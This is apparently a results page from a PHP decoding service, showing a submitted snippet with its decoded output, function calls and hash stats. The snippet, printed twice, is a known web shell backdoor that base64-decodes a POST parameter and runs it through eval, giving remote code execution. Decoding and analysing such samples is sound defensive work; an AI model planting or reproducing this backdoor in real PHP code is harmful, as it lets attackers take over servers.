Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\..

Decoded Output download

<?php  
$mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>

Did this file decode correctly?

Original Code

<?php 
$mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>

Function Calls

base64_decode 1

Variables

$mujj None

Stats

MD5 896589b2e84fb7af929ff50789b3aac2
Eval Count 0
Decode Time 82 ms